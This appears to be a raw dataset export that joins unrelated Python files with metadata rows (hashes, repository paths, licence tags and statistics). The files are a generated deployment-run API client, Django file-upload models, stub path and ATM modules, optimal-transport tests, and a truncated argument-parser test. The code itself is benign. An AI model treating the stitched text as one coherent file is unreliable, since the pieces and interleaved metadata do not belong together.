be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'power_schedule'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method set_power_schedule_for_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `set_power_schedule_for_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'power_schedule' in local_var_params:
body_params = local_var_params['power_schedule']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/powerschedule', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def unpublish_deployment_run(self, id, **kwargs): # noqa: E501
"""Unpublish Deployment Run # noqa: E501
Unpublishes the specified Deployment as a Composition.<br> <br> Consumers will no longer be able to connect to the run, and the run will no longer appear to consumers. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unpublish_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.unpublish_deployment_run_with_http_info(id, **kwargs) # noqa: E501
def unpublish_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Unpublish Deployment Run # noqa: E501
Unpublishes the specified Deployment as a Composition.<br> <br> Consumers will no longer be able to connect to the run, and the run will no longer appear to consumers. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unpublish_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method unpublish_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `unpublish_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/publish', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 50.09132 | 505 | 0.608184 | 19,284 | 166,203 | 5.012912 | 0.020743 | 0.04742 | 0.06995 | 0.026068 | 0.968459 | 0.962449 | 0.955901 | 0.950398 | 0.933846 | 0.928633 | 0 | 0.01593 | 0.316739 | 166,203 | 3,317 | 506 | 50.106421 | 0.835329 | 0.455142 | 0 | 0.784431 | 0 | 0 | 0.184158 | 0.052593 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037924 | false | 0 | 0.003327 | 0 | 0.079175 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2e02aaf313ee685b6f0ac2d4b9e1687eff80652d | 14,849 | py | Python | web/transiq/fileupload/models.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | null | null | null | web/transiq/fileupload/models.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | 14 | 2020-06-05T23:06:45.000Z | 2022-03-12T00:00:18.000Z | web/transiq/fileupload/models.py | manibhushan05/transiq | 763fafb271ce07d13ac8ce575f2fee653cf39343 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
from django.contrib.auth.models import User
from django.db import models
from api.models import S3Upload
from driver.models import Driver
from owner.models import Vehicle, Owner
from sme.models import Sme
from supplier.models import Supplier
from team.models import LrNumber, ManualBooking, Invoice
INVOICE_SENT_MODE_CHOICES = (
('CR', 'Courier'),
('HD', 'Hand Delivered'),
('EM', 'Email Screenshot')
)
INVOICE_CONFIRM_MODE_CHOICES = (
('PH', 'Phone'),
('WA', 'Written Acknowledgement'),
('EM', 'Email Screenshot')
)
class PODFile(models.Model):
uploaded_by = models.ForeignKey(User, null=True, blank=True, related_name='pod_file_uploaded_by',
on_delete=models.CASCADE)
verified_by = models.ForeignKey(User, null=True, blank=True, related_name='pod_file_verified_by',
on_delete=models.CASCADE, limit_choices_to={'is_staff': True})
lr_number = models.ForeignKey(LrNumber, null=True, related_name='pod_files', on_delete=models.CASCADE)
booking = models.ForeignKey(ManualBooking, null=True, blank=True, on_delete=models.CASCADE)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_pod', on_delete=models.CASCADE)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
verified_datetime = models.DateTimeField(null=True, blank=True)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="pod_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="pod_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('lr_number', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
def __unicode__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'lr_number': self.lr_number_id,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class WeighingSlip(models.Model):
uploaded_by = models.ForeignKey(User, null=True, blank=True, related_name='weighing_slip_uploaded_by',
on_delete=models.CASCADE)
verified_by = models.ForeignKey(User, null=True, blank=True, related_name='weighing_slip_file_verified_by',
on_delete=models.CASCADE, limit_choices_to={'is_staff': True})
booking = models.ForeignKey(ManualBooking, null=True, blank=True, on_delete=models.CASCADE)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_weighing_slip', on_delete=models.CASCADE)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
verified_datetime = models.DateTimeField(null=True, blank=True)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE,
related_name="weighing_slip_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE,
related_name="weighing_slip_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
def __unicode__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'booking_id': self.booking_id,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class VehicleFile(models.Model):
document_categories_choices = (
('PUC', 'Puc Certificate'),
('FIT', 'Fitness Certificate'),
('REG', 'Registration Certificate'),
('PERM', 'Permission Certificate'),
('INS', 'Insurance Certificate'),
)
uploaded_by = models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
vehicle = models.ForeignKey(Vehicle, null=True, related_name='vehicle_files', on_delete=models.CASCADE)
supplier_vehicle = models.ForeignKey('supplier.Vehicle', null=True, related_name='supplier_vehicle_files',
on_delete=models.CASCADE)
document_category = models.CharField(max_length=70, choices=document_categories_choices, null=True)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
serial = models.CharField(max_length=20)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_vehicle', on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="vehicle_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="vehicle_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('vehicle', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
def __unicode__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'vehicle_number': '' if not self.vehicle else self.vehicle.vehicle_number,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class OwnerFile(models.Model):
DOCUMENT_TYPE_CHOICES = (
('PAN', 'PAN Card'),
('DL', 'Driving Licence'),
('EL', 'Election ID'),
('AC', 'Aadhar Card'),
('PT', 'Passport'),
('RC', 'Ration Card'),
('DEC', 'Declaration'),
)
uploaded_by = models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
owner = models.ForeignKey(Owner, null=True, related_name='owner_files', on_delete=models.CASCADE)
supplier = models.ForeignKey(Supplier, null=True, related_name='supplier_files', on_delete=models.CASCADE)
document_category = models.CharField(max_length=70, choices=DOCUMENT_TYPE_CHOICES, null=True)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
serial = models.CharField(max_length=20)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_owner', on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="owner_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="owner_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('owner', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
def __unicode__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'owner_name': '' if not self.owner else self.owner.get_name(),
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class DriverFile(models.Model):
DOCUMENT_TYPE_CHOICES = (
('PAN', 'PAN Card'),
('DL', 'Driving Licence'),
('EL', 'Election ID'),
('AC', 'Aadhar Card'),
('PT', 'Passport'),
('RC', 'Ration Card'),
)
uploaded_by = models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
driver = models.ForeignKey(Driver, null=True, related_name='driver_files', on_delete=models.CASCADE)
supplier_driver = models.ForeignKey(to='supplier.Driver', related_name='supplier_driver_files', blank=True,
null=True,
on_delete=models.CASCADE)
document_category = models.CharField(max_length=70, choices=DOCUMENT_TYPE_CHOICES, null=True)
s3_url = models.URLField(blank=True, null=True, unique=True)
s3_thumb_url = models.URLField(blank=True, null=True, unique=True)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_driver', on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="driver_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="driver_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('driver', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
def __unicode__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'driver_name': '' if not self.driver else self.driver.name,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class ChequeFile(models.Model):
uploaded_by = models.ForeignKey(User, null=True, blank=True, related_name='fileupload_cheque_uploaded_by',
on_delete=models.CASCADE)
resolved_by = models.ForeignKey(User, null=True, blank=True, related_name='fileupload_cheque_resolved_by',
on_delete=models.CASCADE)
s3_url = models.URLField(blank=True, null=True, unique=True)
resolved_datetime = models.DateTimeField(null=True, blank=True)
customer_name = models.CharField(max_length=300, null=True)
customer = models.ForeignKey(Sme, related_name='cheque_files', null=True, blank=True, on_delete=models.CASCADE)
amount = models.IntegerField(default=0)
cheque_number = models.CharField(max_length=6, null=True, blank=True)
cheque_date = models.DateField(null=True)
remarks = models.CharField(max_length=300, blank=True, null=True)
resolved = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='cheque_files', on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="cheque_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name="cheque_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
class Meta:
unique_together = ('customer_name', 'serial')
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
def __unicode__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'customer_name': self.customer_name,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
class InvoiceReceiptFile(models.Model):
invoice_sent_mode = models.CharField(max_length=2, choices=INVOICE_SENT_MODE_CHOICES, null=True)
invoice_confirm_mode = models.CharField(max_length=2, choices=INVOICE_CONFIRM_MODE_CHOICES, null=True)
invoice_confirm_by_name = models.CharField(max_length=50, null=True, blank=True)
invoice_confirm_by_phone = models.CharField(max_length=15, null=True, blank=True)
uploaded_by = models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
invoice_number = models.CharField(max_length=50, blank=True, null=True)
invoice_receipt = models.ForeignKey(Invoice, null=True, blank=True, on_delete=models.CASCADE)
verified = models.BooleanField(default=False)
is_valid = models.BooleanField(default=False)
serial = models.CharField(max_length=20)
s3_upload = models.ForeignKey(S3Upload, related_name='upload_invoice_receipt', null=True, on_delete=models.CASCADE)
created_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE,
related_name="invoice_receipt_file_created_by")
changed_by = models.ForeignKey(User, null=True, on_delete=models.CASCADE,
related_name="invoice_receipt_file_changed_by")
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
deleted = models.BooleanField(default=False)
deleted_on = models.DateTimeField(null=True, blank=True)
def url(self):
return self.s3_upload.public_url()
def filename(self):
return self.s3_upload.filename
def __unicode__(self):
return self.filename()
def to_json(self):
return {
'uploaded_by': self.uploaded_by_id,
'serial': self.serial,
'filename': self.filename(),
'url': self.url()
}
| 43.673529 | 119 | 0.686107 | 1,819 | 14,849 | 5.367235 | 0.085761 | 0.05654 | 0.060227 | 0.090341 | 0.831814 | 0.804159 | 0.780703 | 0.776196 | 0.761754 | 0.761754 | 0 | 0.006475 | 0.199205 | 14,849 | 339 | 120 | 43.80236 | 0.814566 | 0.00101 | 0 | 0.648084 | 0 | 0 | 0.098571 | 0.031958 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0.006969 | 0.027875 | 0.097561 | 0.686411 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
2e299e3cd074dedfe4726e80156ff2e67c3d32f3 | 385 | py | Python | _paths.py | supcl/mkecs-kde | 340c81466aabefc8e1df27c9ce151fde24f78a3a | [
"MIT"
] | 1 | 2019-05-01T02:52:31.000Z | 2019-05-01T02:52:31.000Z | _paths.py | marquettecomputationalsocialscience/mkecs-kde | 33fdec5e7691701d65de8a38aa1f27ecadb3d91b | [
"MIT"
] | null | null | null | _paths.py | marquettecomputationalsocialscience/mkecs-kde | 33fdec5e7691701d65de8a38aa1f27ecadb3d91b | [
"MIT"
] | 1 | 2019-01-24T17:46:15.000Z | 2019-01-24T17:46:15.000Z | def project_path():
path = 'set_path'
return str(path)
def sessions_path():
path = 'set_path'
return str(path)
def db_path():
path = 'set_path'
return str(path)
def plot_path_long():
path = 'set_path'
return str(path)
def plot_path_short():
path = 'set_path'
return str(path)
def mke_nhbd_path():
path = 'set_path'
return str(path)
| 16.041667 | 22 | 0.628571 | 57 | 385 | 3.982456 | 0.22807 | 0.185022 | 0.290749 | 0.449339 | 0.84141 | 0.84141 | 0.84141 | 0.599119 | 0.30837 | 0 | 0 | 0 | 0.246753 | 385 | 23 | 23 | 16.73913 | 0.782759 | 0 | 0 | 0.666667 | 0 | 0 | 0.124675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
2e91073c706a6d937cf169e0e94dba689276e6ac | 260 | py | Python | ATMProject/ATMSite/ATM/processing.py | HardinScott/ATM | 3dbf763f150d307fc75004ef0fb4692a62a6149d | [
"MIT"
] | null | null | null | ATMProject/ATMSite/ATM/processing.py | HardinScott/ATM | 3dbf763f150d307fc75004ef0fb4692a62a6149d | [
"MIT"
] | null | null | null | ATMProject/ATMSite/ATM/processing.py | HardinScott/ATM | 3dbf763f150d307fc75004ef0fb4692a62a6149d | [
"MIT"
] | null | null | null | def withdraw(request):
message = "Withdraw message"
# TODO
return message
def transfer(request):
message = "Transfer message"
# TODO
return message
def enquiry(request):
message = "Enquiry message"
# TODO
return message
| 15.294118 | 32 | 0.65 | 27 | 260 | 6.259259 | 0.296296 | 0.248521 | 0.301775 | 0.426036 | 0.319527 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.269231 | 260 | 16 | 33 | 16.25 | 0.889474 | 0.053846 | 0 | 0.333333 | 0 | 0 | 0.194215 | 0 | 0 | 0 | 0 | 0.0625 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
cf31688ef3d957794db694a259d28a79941953a3 | 6,957 | py | Python | fastuot/tests/test_fastuot.py | thibsej/fast_uot | aa057b168065e582378c4f88baa32350f0267401 | [
"MIT"
] | 5 | 2022-01-05T23:16:45.000Z | 2022-03-30T11:15:39.000Z | fastuot/tests/test_fastuot.py | thibsej/fast_uot | aa057b168065e582378c4f88baa32350f0267401 | [
"MIT"
] | null | null | null | fastuot/tests/test_fastuot.py | thibsej/fast_uot | aa057b168065e582378c4f88baa32350f0267401 | [
"MIT"
] | null | null | null | import pytest
import numpy as np
from fastuot.uot1d import rescale_potentials, dual_loss, init_greed_uot, \
solve_uot, lazy_potential, solve_ot, homogeneous_line_search, \
invariant_dual_loss, newton_line_search
p = 1.5
@pytest.mark.parametrize('seed,rho,rho2,mass', [(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_rescale_potential_same_mass(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
normalize = lambda p: p / np.sum(p)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
f = np.random.normal(size=a.shape[0])
g = np.random.normal(size=b.shape[0])
transl = rescale_potentials(f, g, a, b, rho, rho2)
A, B = a * np.exp(-(f + transl) / rho), b * np.exp(-(g - transl) / rho2)
assert np.allclose(np.sum(A), np.sum(B), atol=1e-10)
@pytest.mark.parametrize('seed,rho,rho2,mass', [(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_rescale_potential_increase_score(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
normalize = lambda p: p / np.sum(p)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
f = np.random.normal(size=a.shape[0])
g = np.random.normal(size=b.shape[0])
score1 = dual_loss(f, g, a, b, rho, rho2=rho2)
transl = rescale_potentials(f, g, a, b, rho, rho2)
score2 = dual_loss(f + transl, g - transl, a, b, rho, rho2=rho2)
assert score1 <= score2 + 1e-16
@pytest.mark.parametrize('seed,boo', [(a, b) for a in [1, 2, 3, 4, 5, 6, 7]
for b in [True, False]])
def test_lazy_pot_is_feasible(seed, boo):
n = int(15)
m = int(16)
np.random.seed(seed)
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
f, g = lazy_potential(x, y, p, diagonal=boo)
T = np.abs(x[:, None] - y[None, :]) ** p + 1e-15 > (
f[:, None] + g[None, :])
assert np.all(T)
@pytest.mark.parametrize('seed,rho,rho2,mass', [(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_init_greed_is_feasible(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
normalize = lambda p: p / np.sum(p)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
ft, gt = init_greed_uot(a, b, x, y, p, rho, rho2=rho2)
T = np.abs(x[:, None] - y[None, :]) ** p + 1e-15 > (
ft[:, None] + gt[None, :])
assert np.all(T)
@pytest.mark.parametrize('seed,rho,rho2,mass,niter,linesearch',
[(a, b, c, d, e, f)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]
for e in [1, 10, 50, 500]
for f in ['homogeneous', 'newton', 'default']])
def test_pot_fw_is_feasible(seed, rho, rho2, mass, niter, linesearch):
n = int(15)
m = int(16)
np.random.seed(seed)
normalize = lambda p: p / np.sum(p)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
ft, gt = init_greed_uot(a, b, x, y, p, rho, rho2=rho2)
_, _, _, f, g, _ = solve_uot(a, b, x, y, p, rho, rho2=rho2, niter=niter,
tol=1e-6,
greed_init=True, line_search=linesearch,
stable_lse=True)
T = np.abs(x[:, None] - y[None, :]) ** p + 1e-15 > (
ft[:, None] + gt[None, :])
assert np.all(T)
@pytest.mark.parametrize('seed,rho,rho2,mass',
[(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_homogeneous_linesearch_decrease(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
normalize = lambda p: p / np.sum(p)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
_, _, _, fb, gb, _ = solve_ot(a / np.sum(a), b / np.sum(b), x, y, p)
fc, gc = lazy_potential(x, y, p)
t = homogeneous_line_search(fb, gb, fc - fb, gc - gb, a, b, rho, rho2,
nits=3)
ft, gt = fb + t * (fc - fb), gb + t * (gc - gb)
s0 = invariant_dual_loss(fb, gb, a, b, rho, rho2)
s1 = invariant_dual_loss(fc, gc, a, b, rho, rho2)
st = invariant_dual_loss(ft, gt, a, b, rho, rho2)
assert st >= s0 + t * (s1 - s0)
@pytest.mark.parametrize('seed,rho,rho2,mass',
[(a, b, c, d)
for a in [1, 2, 3, 4, 5, 6, 7]
for b in [0.1, 1.0, 10.0]
for c in [0.1, 1.0, 10.0]
for d in [0.5, 1., 2.]])
def test_newton_linesearch_decrease(seed, rho, rho2, mass):
n = int(15)
m = int(16)
np.random.seed(seed)
normalize = lambda p: p / np.sum(p)
a = normalize(np.random.uniform(size=n))
a = mass * a
b = normalize(np.random.uniform(size=m))
x = np.sort(np.random.uniform(size=n))
y = np.sort(np.random.uniform(size=m))
_, _, _, fb, gb, _ = solve_ot(a / np.sum(a), b / np.sum(b), x, y, p)
fc, gc = lazy_potential(x, y, p)
t = newton_line_search(fb, gb, fc - fb, gc - gb, a, b, rho, rho2,
nits=3)
ft, gt = fb + t * (fc - fb), gb + t * (gc - gb)
s0 = invariant_dual_loss(fb, gb, a, b, rho, rho2)
s1 = invariant_dual_loss(fc, gc, a, b, rho, rho2)
st = invariant_dual_loss(ft, gt, a, b, rho, rho2)
assert st >= s0 + t * (s1 - s0)
# TODO: FW yields same answer for all line search
| 41.410714 | 78 | 0.482679 | 1,107 | 6,957 | 2.957543 | 0.101174 | 0.080635 | 0.100794 | 0.127673 | 0.808491 | 0.798412 | 0.774893 | 0.774893 | 0.774893 | 0.74832 | 0 | 0.059441 | 0.356763 | 6,957 | 167 | 79 | 41.658683 | 0.672179 | 0.006756 | 0 | 0.78 | 0 | 0 | 0.022727 | 0.005067 | 0 | 0 | 0 | 0.005988 | 0.046667 | 1 | 0.046667 | false | 0 | 0.02 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cf74331c1b40bd484c9516716a91125caca00be1 | 4,056 | py | Python | tests/commands/args/test_number.py | talismud/talismud | 366d75c30e51a43fbcd2676bf8b977f2745d3741 | [
"BSD-3-Clause"
] | null | null | null | tests/commands/args/test_number.py | talismud/talismud | 366d75c30e51a43fbcd2676bf8b977f2745d3741 | [
"BSD-3-Clause"
] | null | null | null | tests/commands/args/test_number.py | talismud/talismud | 366d75c30e51a43fbcd2676bf8b977f2745d3741 | [
"BSD-3-Clause"
] | null | null | null | from command.args import CommandArgs
def test_one_correct_number():
"""Test to parse a command with one number."""
args = CommandArgs()
args.add_argument("number")
result = args.parse(None, "52")
assert bool(result)
assert result.number == 52
def test_one_incorrect_number():
"""Test to parse a command with one number."""
args = CommandArgs()
args.add_argument("number")
